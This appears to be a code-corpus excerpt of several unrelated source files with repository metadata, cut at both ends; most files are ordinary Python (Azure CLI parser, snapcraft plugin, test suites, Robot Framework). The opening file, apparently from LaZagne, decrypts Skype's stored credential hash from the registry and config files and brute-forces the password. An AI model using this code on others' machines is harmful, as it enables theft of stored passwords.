num = win32api.RegQueryInfoKey(hkey)[1]
k = win32api.RegEnumValue(hkey, 0)
if k:
key = k[1]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return 'failed'
# get hash from configuration file
def get_hash_credential(self, xml_file):
tree = ET.ElementTree(file=xml_file)
encrypted_hash = tree.find('Lib/Account/Credentials3')
if encrypted_hash != None:
return encrypted_hash.text
else:
return 'failed'
# decrypt hash to get the md5 to bruteforce
def get_md5_hash(self, enc_hex, key):
# convert hash from hex to binary
enc_binary = binascii.unhexlify(enc_hex)
# retrieve the salt
salt = hashlib.sha1('\x00\x00\x00\x00' + key).digest() + hashlib.sha1('\x00\x00\x00\x01' + key).digest()
# encrypt value used with the XOR operation
aes_key = self.aes_encrypt(struct.pack('I', 0) * 4, salt[0:32])[0:16]
# XOR operation
decrypted = []
for d in range(16):
decrypted.append(struct.unpack('B', enc_binary[d])[0] ^ struct.unpack('B', aes_key[d])[0])
# cast the result byte
tmp = ''
for dec in decrypted:
tmp = tmp + struct.pack(">I", dec).strip('\x00')
# byte to hex
return binascii.hexlify(tmp)
def dictionary_attack(self, login, md5):
wordlist = get_dico()
for word in wordlist:
hash = hashlib.md5('%s\nskyper\n%s' % (login, word)).hexdigest()
if hash == md5:
return word
return False
# main function
def run(self):
# print title
Header().title_info('Skype')
if 'APPDATA' in os.environ:
directory = os.environ['APPDATA'] + '\Skype'
if os.path.exists(directory):
# retrieve the key used to build the salt
key = self.get_regkey()
if key == 'failed':
print_debug('ERROR', 'The salt has not been retrieved')
else:
pwdFound = []
for d in os.listdir(directory):
if os.path.exists(directory + os.sep + d + os.sep + 'config.xml'):
values = {}
try:
values['username'] = d
# get encrypted hash from the config file
enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + 'config.xml')
if enc_hex == 'failed':
print_debug('WARNING', 'No credential stored on the config.xml file.')
else:
# decrypt the hash to get the md5 to brue force
values['hash_md5'] = self.get_md5_hash(enc_hex, key)
values['shema to bruteforce'] = values['username'] + '\\nskyper\\n<password>'
# Try a dictionary attack on the hash
password = self.dictionary_attack(values['username'], values['hash_md5'])
if password:
values['password'] = password
pwdFound.append(values)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
# print the results
print_output("Skype", pwdFound)
else:
print_debug('INFO', 'Skype not installed.')
else:
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
|
Relin/LaZagne
|
Windows/src/LaZagne/softwares/chats/skype.py
|
Python
|
lgpl-3.0
| 4,298 | 0.034435 |
from . import adaptVor_driver
from .adaptVor_driver import AdaptiveVoronoiDriver
|
westpa/westpa
|
src/westext/adaptvoronoi/__init__.py
|
Python
|
mit
| 82 | 0 |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import sys
import argparse
import argcomplete
import azure.cli.core.telemetry as telemetry
import azure.cli.core._help as _help
from azure.cli.core.util import CLIError
from azure.cli.core._pkg_util import handle_module_not_installed
import azure.cli.core.azlogging as azlogging
logger = azlogging.get_az_logger(__name__)
class IncorrectUsageError(CLIError):
'''Raised when a command is incorrectly used and the usage should be
displayed to the user.
'''
pass
class CaseInsensitiveChoicesCompleter(argcomplete.completers.ChoicesCompleter): # pylint: disable=too-few-public-methods
def __call__(self, prefix, **kwargs):
return (c for c in self.choices if c.lower().startswith(prefix.lower()))
# Override the choices completer with one that is case insensitive
argcomplete.completers.ChoicesCompleter = CaseInsensitiveChoicesCompleter
def enable_autocomplete(parser):
argcomplete.autocomplete = argcomplete.CompletionFinder()
argcomplete.autocomplete(parser, validator=lambda c, p: c.lower().startswith(p.lower()),
default_completer=lambda _: ())
class AzCliCommandParser(argparse.ArgumentParser):
"""ArgumentParser implementation specialized for the
Azure CLI utility.
"""
def __init__(self, **kwargs):
self.subparsers = {}
self.parents = kwargs.get('parents', [])
self.help_file = kwargs.pop('help_file', None)
# We allow a callable for description to be passed in in order to delay-load any help
# or description for a command. We better stash it away before handing it off for
# "normal" argparse handling...
self._description = kwargs.pop('description', None)
self.command_source = kwargs.pop('_command_source', None)
super(AzCliCommandParser, self).__init__(**kwargs)
def load_command_table(self, command_table):
"""Load a command table into our parser.
"""
# If we haven't already added a subparser, we
# better do it.
if not self.subparsers:
sp = self.add_subparsers(dest='_command_package')
sp.required = True
self.subparsers = {(): sp}
for command_name, metadata in command_table.items():
subparser = self._get_subparser(command_name.split())
command_verb = command_name.split()[-1]
# To work around http://bugs.python.org/issue9253, we artificially add any new
# parsers we add to the "choices" section of the subparser.
subparser.choices[command_verb] = command_verb
# inject command_module designer's help formatter -- default is HelpFormatter
fc = metadata.formatter_class or argparse.HelpFormatter
command_parser = subparser.add_parser(command_verb,
description=metadata.description,
parents=self.parents,
conflict_handler='error',
help_file=metadata.help,
formatter_class=fc,
_command_source=metadata.command_source)
argument_validators = []
argument_groups = {}
for arg in metadata.arguments.values():
if arg.validator:
argument_validators.append(arg.validator)
if arg.arg_group:
try:
group = argument_groups[arg.arg_group]
except KeyError:
# group not found so create
group_name = '{} Arguments'.format(arg.arg_group)
group = command_parser.add_argument_group(
arg.arg_group, group_name)
argument_groups[arg.arg_group] = group
param = group.add_argument(
*arg.options_list, **arg.options)
else:
try:
param = command_parser.add_argument(
*arg.options_list, **arg.options)
except argparse.ArgumentError:
dest = arg.options['dest']
if dest in ['no_wait', 'raw']:
pass
else:
raise
param.completer = arg.completer
command_parser.set_defaults(
func=metadata,
command=command_name,
_validators=argument_validators,
_parser=command_parser)
def _get_subparser(self, path):
"""For each part of the path, walk down the tree of
subparsers, creating new ones if one doesn't already exist.
"""
for length in range(0, len(path)):
parent_subparser = self.subparsers.get(tuple(path[0:length]), None)
if not parent_subparser:
# No subparser exists for the given subpath - create and register
# a new subparser.
# Since we know that we always have a root subparser (we created)
# one when we started loading the command table, and we walk the
# path from left to right (i.e. for "cmd subcmd1 subcmd2", we start
# with ensuring that a subparser for cmd exists, then for subcmd1,
# subcmd2 and so on), we know we can always back up one step and
# add a subparser if one doesn't exist
grandparent_subparser = self.subparsers[tuple(path[:length - 1])]
new_parser = grandparent_subparser.add_parser(path[length - 1])
# Due to http://bugs.python.org/issue9253, we have to give the subparser
# a destination and set it to required in order to get a
# meaningful error
parent_subparser = new_parser.add_subparsers(dest='subcommand')
parent_subparser.required = True
self.subparsers[tuple(path[0:length])] = parent_subparser
return parent_subparser
def _handle_command_package_error(self, err_msg): # pylint: disable=no-self-use
if err_msg and err_msg.startswith('argument _command_package: invalid choice:'):
import re
try:
possible_module = re.search("argument _command_package: invalid choice: '(.+?)'",
err_msg).group(1)
handle_module_not_installed(possible_module)
except AttributeError:
# regular expression pattern match failed so unable to retrieve
# module name
pass
except Exception as e: # pylint: disable=broad-except
logger.debug('Unable to handle module not installed: %s', str(e))
def validation_error(self, message):
telemetry.set_user_fault('validation error')
return super(AzCliCommandParser, self).error(message)
def error(self, message):
telemetry.set_user_fault('parse error: {}'.format(message))
self._handle_command_package_error(message)
args = {'prog': self.prog, 'message': message}
logger.error('%(prog)s: error: %(message)s', args)
self.print_usage(sys.stderr)
self.exit(2)
def format_help(self):
is_group = self.is_group()
telemetry.set_command_details(command=self.prog[3:])
telemetry.set_success(summary='show help')
_help.show_help(self.prog.split()[1:],
self._actions[-1] if is_group else self,
is_group)
self.exit()
def _check_value(self, action, value):
# Override to customize the error message when a argument is not among the available choices
# converted value must be one of the choices (if specified)
if action.choices is not None and value not in action.choices:
msg = 'invalid choice: {}'.format(value)
raise argparse.ArgumentError(action, msg)
def is_group(self):
""" Determine if this parser instance represents a group
or a command. Anything that has a func default is considered
a group. This includes any dummy commands served up by the
"filter out irrelevant commands based on argv" command filter """
cmd = self._defaults.get('func', None)
return not (cmd and cmd.handler)
def __getattribute__(self, name):
""" Since getting the description can be expensive (require module loads), we defer
this until someone actually wants to use it (i.e. show help for the command)
"""
if name == 'description':
if self._description:
self.description = self._description() \
if callable(self._description) else self._description
self._description = None
return object.__getattribute__(self, name)
|
QingChenmsft/azure-cli
|
src/azure-cli-core/azure/cli/core/parser.py
|
Python
|
mit
| 9,504 | 0.00263 |
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2019 Manas.Tech
# License granted by Canonical Limited
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""The Crystal plugin can be used for Crystal projects using `shards`.
This plugin uses the common plugin keywords as well as those for "sources".
For more information check the 'plugins' topic for the former and the
'sources' topic for the latter.
Additionally, this plugin uses the following plugin-specific keywords:
- crystal-channel:
(string, default: latest/stable)
The Snap Store channel to install Crystal from.
- crystal-build-options
(list of strings, default: '[]')
Options to use during shards build.
"""
import os
import shutil
from snapcraft import file_utils
from snapcraft.internal import common, elf, errors
from snapcraft.plugins.v1 import PluginV1
_CRYSTAL_CHANNEL = "latest/stable"
class CrystalPlugin(PluginV1):
@classmethod
def schema(cls):
schema = super().schema()
schema["properties"]["crystal-channel"] = {
"type": "string",
"default": _CRYSTAL_CHANNEL,
}
schema["properties"]["crystal-build-options"] = {
"type": "array",
"minitems": 1,
"uniqueItems": True,
"items": {"type": "string"},
"default": [],
}
schema["required"] = ["source"]
return schema
@classmethod
def get_build_properties(cls):
return ["crystal-build-options"]
@classmethod
def get_pull_properties(cls):
return ["crystal-channel"]
def __init__(self, name, options, project):
super().__init__(name, options, project)
if project._get_build_base() not in ("core", "core16", "core18"):
raise errors.PluginBaseError(
part_name=self.name, base=project._get_build_base()
)
self.build_snaps.append("crystal/{}".format(self.options.crystal_channel))
self.build_packages.extend(
[
"gcc",
"pkg-config",
"libpcre3-dev",
"libevent-dev",
"libyaml-dev",
"libgmp-dev",
"libxml2-dev",
]
)
def build(self):
super().build()
self.run(["shards", "install", "--production"], self.builddir)
self.run(
["shards", "build", "--production"] + self.options.crystal_build_options,
self.builddir,
)
output_bin = os.path.join(self.builddir, "bin")
if not os.path.exists(output_bin):
raise errors.SnapcraftEnvironmentError(
"No binaries were built. Ensure the shards.yaml contains valid targets."
)
install_bin_path = os.path.join(self.installdir, "bin")
bin_paths = (os.path.join(output_bin, b) for b in os.listdir(output_bin))
elf_files = (elf.ElfFile(path=b) for b in bin_paths if elf.ElfFile.is_elf(b))
os.makedirs(install_bin_path, exist_ok=True)
for elf_file in elf_files:
shutil.copy2(
elf_file.path,
os.path.join(install_bin_path, os.path.basename(elf_file.path)),
)
elf_dependencies_path = elf_file.load_dependencies(
root_path=self.installdir,
core_base_path=common.get_installed_snap_path(
self.project._get_build_base()
),
arch_triplet=self.project.arch_triplet,
content_dirs=self.project._get_provider_content_dirs(),
)
for elf_dependency_path in elf_dependencies_path:
lib_install_path = os.path.join(
self.installdir, elf_dependency_path[1:]
)
os.makedirs(os.path.dirname(lib_install_path), exist_ok=True)
if not os.path.exists(lib_install_path):
file_utils.link_or_copy(
elf_dependency_path, lib_install_path, follow_symlinks=True
)
|
ubuntu-core/snapcraft
|
snapcraft/plugins/v1/crystal.py
|
Python
|
gpl-3.0
| 4,665 | 0.001501 |
import numpy as np
import h5py
f = h5py.File('hdf5/data_streaming.h5', 'w')
ADSL_2008 = f.create_group("ADSL_Montsouris_2008_07_01")
# retreve: ADSL_2008 = f['ADSL_Montsouris_2008_07_01']
gvb_adsl_2008 = np.load('python_flows/flows_marked_GVB_juill_2008_ADSL_cut_BGP_AS.npy')
ADSL_2008.create_dataset('GVB', data=gvb_adsl_2008)
dipcp_adsl_2008 = np.load('python_flows/dipcp_flows_ADSL_juill_2008.npy')
ADSL_2008.create_dataset('dipcp', data=dipcp_adsl_2008)
FTTH_2008 = f.create_group("FTTH_Montsouris_2008_07_01")
# retreve: FTTH_2008 = f['FTTH_Montsouris_2008_07_01']
gvb_ftth_2008 = np.load('python_flows/flows_marked_GVB_juill_2008_FTTH_BGP_AS.npy')
FTTH_2008.create_dataset('GVB', data=gvb_ftth_2008)
dipcp_ftth_2008 = np.load('python_flows/dipcp_flows_FTTH_juill_2008_TCP.npy')
FTTH_2008.create_dataset('dipcp', data=dipcp_ftth_2008)
ADSL_nov_2009 = f.create_group("ADSL_Montsouris_2009_11_26")
gvb_adsl_nov_2009 = np.load('python_flows/flows_marked_GVB_nov_2009_ADSL_BGP_AS.npy')
ADSL_nov_2009.create_dataset('GVB', data=gvb_adsl_nov_2009)
dipcp_adsl_nov_2009 = np.load('python_flows/dipcp_flows_ADSL_nov_2009.npy')
ADSL_nov_2009.create_dataset('dipcp', data=dipcp_adsl_nov_2009)
FTTH_nov_2009 = f.create_group("FTTH_Montsouris_2009_11_26")
gvb_ftth_nov_2009 = np.load('python_flows/flows_marked_GVB_nov_2009_FTTH_BGP_AS.npy')
FTTH_nov_2009.create_dataset('GVB', data=gvb_ftth_nov_2009)
dipcp_ftth_nov_2009 = np.load('python_flows/dipcp_flows_FTTH_nov_2009.npy')
FTTH_nov_2009.create_dataset('dipcp', data=dipcp_ftth_nov_2009)
ADSL_dec_2009 = f.create_group("ADSL_Rennes_2009_12_14")
gvb_adsl_dec_2009 = np.load('python_flows/flows_marked_GVB_dec_2009_ADSL_BGP_AS.npy')
ADSL_dec_2009.create_dataset('GVB', data=gvb_adsl_dec_2009)
dipcp_adsl_dec_2009 = np.load('python_flows/dipcp_flows_ADSL_dec_2009.npy')
ADSL_dec_2009.create_dataset('dipcp', data=dipcp_adsl_dec_2009)
FTTH_dec_2009 = f.create_group("FTTH_Montsouris_2009_12_14")
gvb_ftth_dec_2009 = np.load('python_flows/flows_marked_GVB_dec_2009_FTTH_BGP_AS.npy')
FTTH_dec_2009.create_dataset('GVB', data=gvb_ftth_dec_2009)
dipcp_ftth_dec_2009 = np.load('python_flows/dipcp_flows_FTTH_dec_2009.npy')
FTTH_dec_2009.create_dataset('dipcp', data=dipcp_ftth_dec_2009)
|
LouisPlisso/analysis_tools
|
old_create_hdf5_data_non_interacif.py
|
Python
|
gpl-3.0
| 2,240 | 0.003125 |
from task19_PageObject.MainPage import MainPage
def test_adding_and_deleting_from_cart(driver):
main_page = MainPage(driver)
main_page.open()
# Add 3 ducks to the cart in a loop
for i in range(1, 4):
# Click at the i-d duck
product_page = main_page.click_to_product_number(i)
product_page.put_product_into_cart()
main_page = product_page.go_to_home_page()
cart_page = main_page.go_to_checkout()
cart_page.remove_all_items_from_cart()
|
byakatat/selenium-training
|
task19_PageObject/test_task19.py
|
Python
|
apache-2.0
| 498 | 0.002008 |
from charmhelpers.core.hookenv import (
config,
unit_get,
)
from charmhelpers.contrib.network.ip import (
get_address_in_network,
is_address_in_network,
is_ipv6,
get_ipv6_addr,
)
from charmhelpers.contrib.hahelpers.cluster import is_clustered
PUBLIC = 'public'
INTERNAL = 'int'
ADMIN = 'admin'
_address_map = {
PUBLIC: {
'config': 'os-public-network',
'fallback': 'public-address'
},
INTERNAL: {
'config': 'os-internal-network',
'fallback': 'private-address'
},
ADMIN: {
'config': 'os-admin-network',
'fallback': 'private-address'
}
}
def canonical_url(configs, endpoint_type=PUBLIC):
'''
Returns the correct HTTP URL to this host given the state of HTTPS
configuration, hacluster and charm configuration.
:configs OSTemplateRenderer: A config tempating object to inspect for
a complete https context.
:endpoint_type str: The endpoint type to resolve.
:returns str: Base URL for services on the current service unit.
'''
scheme = 'http'
if 'https' in configs.complete_contexts():
scheme = 'https'
address = resolve_address(endpoint_type)
if is_ipv6(address):
address = "[{}]".format(address)
return '%s://%s' % (scheme, address)
def resolve_address(endpoint_type=PUBLIC):
resolved_address = None
if is_clustered():
if config(_address_map[endpoint_type]['config']) is None:
# Assume vip is simple and pass back directly
resolved_address = config('vip')
else:
for vip in config('vip').split():
if is_address_in_network(
config(_address_map[endpoint_type]['config']),
vip):
resolved_address = vip
else:
if config('prefer-ipv6'):
fallback_addr = get_ipv6_addr()
else:
fallback_addr = unit_get(_address_map[endpoint_type]['fallback'])
resolved_address = get_address_in_network(
config(_address_map[endpoint_type]['config']), fallback_addr)
if resolved_address is None:
raise ValueError('Unable to resolve a suitable IP address'
' based on charm state and configuration')
else:
return resolved_address
|
jiasir/openstack-trove
|
lib/charmhelpers/contrib/openstack/ip.py
|
Python
|
mit
| 2,332 | 0 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conversion module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph import utils
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.impl import api
from tensorflow.python.autograph.impl import conversion
from tensorflow.python.autograph.pyct import compiler
from tensorflow.python.framework import constant_op
from tensorflow.python.keras.engine import training
from tensorflow.python.platform import test
class ConversionTest(test.TestCase):
def _simple_program_ctx(self):
return converter.ProgramContext(
options=converter.ConversionOptions(recursive=True),
autograph_module=api)
def test_is_whitelisted_for_graph(self):
def test_fn():
return constant_op.constant(1)
self.assertFalse(conversion.is_whitelisted_for_graph(test_fn))
self.assertTrue(conversion.is_whitelisted_for_graph(utils))
self.assertTrue(conversion.is_whitelisted_for_graph(constant_op.constant))
def test_convert_entity_to_ast_unsupported_types(self):
with self.assertRaises(NotImplementedError):
program_ctx = self._simple_program_ctx()
conversion.convert_entity_to_ast('dummy', program_ctx)
def test_convert_entity_to_ast_callable(self):
b = 2
def f(a):
return a + b
program_ctx = self._simple_program_ctx()
nodes, name, info = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertIs(info.namespace['b'], b)
def test_convert_entity_to_ast_function_with_defaults(self):
b = 2
c = 1
def f(a, d=c + 1):
return a + b + d
program_ctx = self._simple_program_ctx()
nodes, name, _ = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertEqual(
compiler.ast_to_source(fn_node.args.defaults[0]).strip(), 'None')
def test_convert_entity_to_ast_call_tree(self):
def g(a):
return a
def f(a):
return g(a)
program_ctx = self._simple_program_ctx()
nodes, _, _ = conversion.convert_entity_to_ast(f, program_ctx)
f_node, = nodes
self.assertEqual('tf__f', f_node.name)
def test_convert_entity_to_ast_class_hierarchy(self):
class TestBase(object):
def __init__(self, x='base'):
self.x = x
def foo(self):
return self.x
def bar(self):
return self.x
class TestSubclass(TestBase):
def __init__(self, y):
super(TestSubclass, self).__init__('sub')
self.y = y
def foo(self):
return self.y
def baz(self):
return self.y
program_ctx = self._simple_program_ctx()
with self.assertRaisesRegex(NotImplementedError, 'classes.*whitelisted'):
conversion.convert_entity_to_ast(TestSubclass, program_ctx)
def test_convert_entity_to_ast_class_hierarchy_whitelisted(self):
class TestSubclass(training.Model):
def __init__(self, y):
super(TestSubclass, self).__init__()
self.built = False
def call(self, x):
return 3 * x
program_ctx = self._simple_program_ctx()
(import_node, class_node), name, _ = conversion.convert_entity_to_ast(
TestSubclass, program_ctx)
self.assertEqual(import_node.names[0].name, 'Model')
self.assertEqual(name, 'TfTestSubclass')
self.assertEqual(class_node.name, 'TfTestSubclass')
def test_convert_entity_to_ast_lambda(self):
b = 2
f = lambda x: b * x if x > 0 else -x
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_entity_to_ast_multiple_lambdas(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda y: b * y)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['a'], a)
def test_convert_entity_to_ast_multiple_lambdas_ambiguous_definitions(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda x: b * x)
program_ctx = self._simple_program_ctx()
with self.assertRaises(ValueError):
conversion.convert_entity_to_ast(f, program_ctx)
def test_convert_entity_to_ast_lambda_code_with_garbage(self):
# pylint:disable=g-long-lambda
f = ( # intentional wrap
lambda x: (
x # intentional wrap
+ 1),)[0]
# pylint:enable=g-long-lambda
program_ctx = self._simple_program_ctx()
(fn_node,), name, _ = conversion.convert_entity_to_ast(f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
def test_convert_entity_to_ast_nested_functions(self):
b = 2
def f(x):
def g(x):
return b * x
return g(x)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual(fn_node.name, 'tf__f')
self.assertEqual('tf__f', name)
self.assertIs(entity_info.namespace['b'], b)
if __name__ == '__main__':
test.main()
|
kevin-coder/tensorflow-fork
|
tensorflow/python/autograph/impl/conversion_test.py
|
Python
|
apache-2.0
| 6,484 | 0.005244 |
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from robot.errors import DataError
from robot.model import SuiteNamePatterns
from robot.output import LOGGER
from robot.utils import get_error_message, unic
from .datarow import DataRow
from .tablepopulators import (SettingTablePopulator, VariableTablePopulator,
TestTablePopulator, KeywordTablePopulator,
NullPopulator)
from .htmlreader import HtmlReader
from .tsvreader import TsvReader
from .txtreader import TxtReader
from .restreader import RestReader
READERS = {'html': HtmlReader, 'htm': HtmlReader, 'xhtml': HtmlReader,
'tsv': TsvReader , 'rst': RestReader, 'rest': RestReader,
'txt': TxtReader, 'robot': TxtReader}
# Hook for external tools for altering ${CURDIR} processing
PROCESS_CURDIR = True
class FromFilePopulator(object):
_populators = {'setting': SettingTablePopulator,
'variable': VariableTablePopulator,
'test case': TestTablePopulator,
'keyword': KeywordTablePopulator}
def __init__(self, datafile):
self._datafile = datafile
self._populator = NullPopulator()
self._curdir = self._get_curdir(datafile.directory)
def _get_curdir(self, path):
return path.replace('\\','\\\\') if path else None
def populate(self, path):
LOGGER.info("Parsing file '%s'." % path)
source = self._open(path)
try:
self._get_reader(path).read(source, self)
except:
raise DataError(get_error_message())
finally:
source.close()
def _open(self, path):
if not os.path.isfile(path):
raise DataError("Data source does not exist.")
try:
# IronPython handles BOM incorrectly if not using binary mode:
# https://ironpython.codeplex.com/workitem/34655
return open(path, 'rb')
except:
raise DataError(get_error_message())
def _get_reader(self, path):
extension = os.path.splitext(path.lower())[-1][1:]
try:
return READERS[extension]()
except KeyError:
raise DataError("Unsupported file format '%s'." % extension)
def start_table(self, header):
self._populator.populate()
table = self._datafile.start_table(DataRow(header).all)
self._populator = self._populators[table.type](table) \
if table is not None else NullPopulator()
return bool(self._populator)
def eof(self):
self._populator.populate()
def add(self, row):
if PROCESS_CURDIR and self._curdir:
row = self._replace_curdirs_in(row)
data = DataRow(row)
if data:
self._populator.add(data)
def _replace_curdirs_in(self, row):
return [cell.replace('${CURDIR}', self._curdir) for cell in row]
class FromDirectoryPopulator(object):
ignored_prefixes = ('_', '.')
ignored_dirs = ('CVS',)
def populate(self, path, datadir, include_suites=None,
warn_on_skipped=False, include_extensions=None, recurse=True):
LOGGER.info("Parsing test data directory '%s'" % path)
include_suites = self._get_include_suites(path, include_suites or [])
init_file, children = self._get_children(path, include_extensions,
include_suites)
if init_file:
self._populate_init_file(datadir, init_file)
if recurse:
self._populate_children(datadir, children, include_extensions,
include_suites, warn_on_skipped)
def _populate_init_file(self, datadir, init_file):
datadir.initfile = init_file
try:
FromFilePopulator(datadir).populate(init_file)
except DataError as err:
LOGGER.error(err.message)
def _populate_children(self, datadir, children, include_extensions,
include_suites, warn_on_skipped):
for child in children:
try:
datadir.add_child(child, include_suites, include_extensions,
warn_on_skipped)
except DataError as err:
self._log_failed_parsing("Parsing data source '%s' failed: %s"
% (child, err.message), warn_on_skipped)
def _log_failed_parsing(self, message, warn):
if warn:
LOGGER.warn(message)
else:
LOGGER.info(message)
def _get_include_suites(self, path, incl_suites):
if not isinstance(incl_suites, SuiteNamePatterns):
incl_suites = SuiteNamePatterns(self._create_included_suites(incl_suites))
if not incl_suites:
return incl_suites
# If a directory is included, also all its children should be included.
if self._directory_is_included(path, incl_suites):
return SuiteNamePatterns()
return incl_suites
def _create_included_suites(self, incl_suites):
for suite in incl_suites:
yield suite
while '.' in suite:
suite = suite.split('.', 1)[1]
yield suite
def _directory_is_included(self, path, incl_suites):
name = os.path.basename(os.path.normpath(path))
return self._is_in_included_suites(name, incl_suites)
def _get_children(self, dirpath, incl_extensions, incl_suites):
init_file = None
children = []
for path, is_init_file in self._list_dir(dirpath, incl_extensions,
incl_suites):
if is_init_file:
if not init_file:
init_file = path
else:
LOGGER.error("Ignoring second test suite init file '%s'." % path)
else:
children.append(path)
return init_file, children
def _list_dir(self, dir_path, incl_extensions, incl_suites):
# os.listdir returns Unicode entries when path is Unicode
names = os.listdir(unic(dir_path))
for name in sorted(names, key=lambda item: item.lower()):
name = unic(name) # needed to handle nfc/nfd normalization on OSX
path = os.path.join(dir_path, name)
base, ext = os.path.splitext(name)
ext = ext[1:].lower()
if self._is_init_file(path, base, ext, incl_extensions):
yield path, True
elif self._is_included(path, base, ext, incl_extensions, incl_suites):
yield path, False
else:
LOGGER.info("Ignoring file or directory '%s'." % name)
def _is_init_file(self, path, base, ext, incl_extensions):
return (base.lower() == '__init__' and
self._extension_is_accepted(ext, incl_extensions) and
os.path.isfile(path))
def _extension_is_accepted(self, ext, incl_extensions):
if incl_extensions:
return ext in incl_extensions
return ext in READERS
def _is_included(self, path, base, ext, incl_extensions, incl_suites):
if base.startswith(self.ignored_prefixes):
return False
if os.path.isdir(path):
return base not in self.ignored_dirs or ext
if not self._extension_is_accepted(ext, incl_extensions):
return False
return self._is_in_included_suites(base, incl_suites)
def _is_in_included_suites(self, name, incl_suites):
return not incl_suites or incl_suites.match(self._split_prefix(name))
def _split_prefix(self, name):
return name.split('__', 1)[-1]
|
alexandrul-ci/robotframework
|
src/robot/parsing/populators.py
|
Python
|
apache-2.0
| 8,341 | 0.001079 |
"""Tests for the USB Discovery integration."""
from homeassistant.components.usb.models import USBDevice
conbee_device = USBDevice(
device="/dev/cu.usbmodemDE24338801",
vid="1CF1",
pid="0030",
serial_number="DE2433880",
manufacturer="dresden elektronik ingenieurtechnik GmbH",
description="ConBee II",
)
slae_sh_device = USBDevice(
device="/dev/cu.usbserial-110",
vid="10C4",
pid="EA60",
serial_number="00_12_4B_00_22_98_88_7F",
manufacturer="Silicon Labs",
description="slae.sh cc2652rb stick - slaesh's iot stuff",
)
electro_lama_device = USBDevice(
device="/dev/cu.usbserial-110",
vid="1A86",
pid="7523",
serial_number=None,
manufacturer=None,
description="USB2.0-Serial",
)
|
jawilson/home-assistant
|
tests/components/usb/__init__.py
|
Python
|
apache-2.0
| 753 | 0 |
from bambu_mail.shortcuts import subscribe
def newsletter_optin(sender, user, **kwargs):
subscribe(
user.email,
list_id = 'signup',
double_optin = False,
send_welcome = False
)
|
iamsteadman/bambu-mail
|
bambu_mail/receivers.py
|
Python
|
apache-2.0
| 217 | 0.036866 |
'''Doc build constants'''
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
DOCKER_SOCKET = getattr(settings, 'DOCKER_SOCKET', 'unix:///var/run/docker.sock')
DOCKER_VERSION = getattr(settings, 'DOCKER_VERSION', 'auto')
DOCKER_IMAGE = getattr(settings, 'DOCKER_IMAGE', 'rtfd-build')
DOCKER_LIMITS = {'memory': '200m', 'time': 600}
DOCKER_LIMITS.update(getattr(settings, 'DOCKER_LIMITS', {}))
DOCKER_TIMEOUT_EXIT_CODE = 42
DOCKER_OOM_EXIT_CODE = 137
|
titiushko/readthedocs.org
|
readthedocs/doc_builder/constants.py
|
Python
|
mit
| 491 | 0.002037 |
from typing import KeysView
from baby_steps import given, then, when
from district42 import optional, schema
def test_dict_empty_keys():
with given:
sch = schema.dict
with when:
res = sch.keys()
with then:
assert res == KeysView([])
def test_dict_keys():
with given:
sch = schema.dict({
"id": schema.int,
"name": schema.str,
optional("email"): schema.str,
})
with when:
res = sch.keys()
with then:
assert res == KeysView(["id", "name", "email"])
|
nikitanovosibirsk/district42
|
tests/dict/test_dict_keys.py
|
Python
|
mit
| 572 | 0 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Category.content'
